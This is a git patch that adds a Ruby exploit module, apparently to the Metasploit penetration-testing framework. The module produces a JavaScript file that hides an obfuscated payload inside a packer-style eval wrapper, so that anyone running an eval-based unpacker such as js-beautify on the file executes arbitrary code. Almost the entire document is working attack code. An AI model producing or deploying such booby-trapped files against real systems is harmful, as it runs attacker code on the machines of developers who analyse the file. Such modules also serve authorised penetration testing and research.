From f8609ab0ba821dc3fa65fb669aa899d66d2b2ef7 Mon Sep 17 00:00:00 2001 From: joev Date: Wed, 18 Feb 2015 11:26:45 -0600 Subject: [PATCH] Add file format exploit for injecting code into unpackers. --- .../fileformat/js_unpacker_eval_injection.rb | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb new file mode 100644 index 0000000000..a608a0f6e8 --- /dev/null +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -0,0 +1,46 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/jsobfu' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::JSObfu + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Javascript injection for eval-based unpackers', + 'Description' => %q{ + This module generates a Javascript file that executes arbitrary code + when an eval-based unpacker is run on it. Works against js-beautify's + P_A_C_K_E_R unpacker. + }, + 'Author' => [ 'joev' ], + 'License' => MSF_LICENSE, + 'References' => + [ + ], + 'Platform' => 'nodejs', + 'Arch' => ARCH_NODEJS, + 'Privileged' => false, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('FILENAME', [true, 'The file name.', 'msf.js']), + OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.']) + ], self.class) + end + + def exploit + p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded); + print_status("Creating '#{datastore['FILENAME']}' file...") + file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") + end + +end